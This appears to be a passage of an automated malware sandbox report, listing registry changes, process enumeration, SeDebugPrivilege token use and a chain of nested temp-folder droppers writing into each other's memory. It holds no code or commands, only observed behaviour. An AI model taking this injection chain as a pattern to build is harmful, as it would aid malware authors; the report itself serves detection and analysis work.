Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\conhost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Ze50cJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Ze50cJ.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Ze50cJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1044 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\93a3be7f493345d46d47c94242dc697144cb76aca5e7924d4902a175315ef652.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NH1rc74.exe
PID 1044 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\93a3be7f493345d46d47c94242dc697144cb76aca5e7924d4902a175315ef652.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NH1rc74.exe
PID 1044 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\93a3be7f493345d46d47c94242dc697144cb76aca5e7924d4902a175315ef652.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NH1rc74.exe
PID 1076 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NH1rc74.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TV5CN97.exe
PID 1076 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NH1rc74.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TV5CN97.exe
PID 1076 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NH1rc74.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TV5CN97.exe
PID 4644 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TV5CN97.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jh6MS90.exe
PID 4644 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TV5CN97.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jh6MS90.exe
PID 4644 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TV5CN97.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jh6MS90.exe
PID 4736 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jh6MS90.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AX4Kl05.exe
PID 4736 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jh6MS90.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AX4Kl05.exe
PID 4736 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jh6MS90.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AX4Kl05.exe
PID 4496 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AX4Kl05.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\kd2hM38.exe
PID 4496 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AX4Kl05.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\kd2hM38.exe
PID 4496 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AX4Kl05.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\kd2hM38.exe
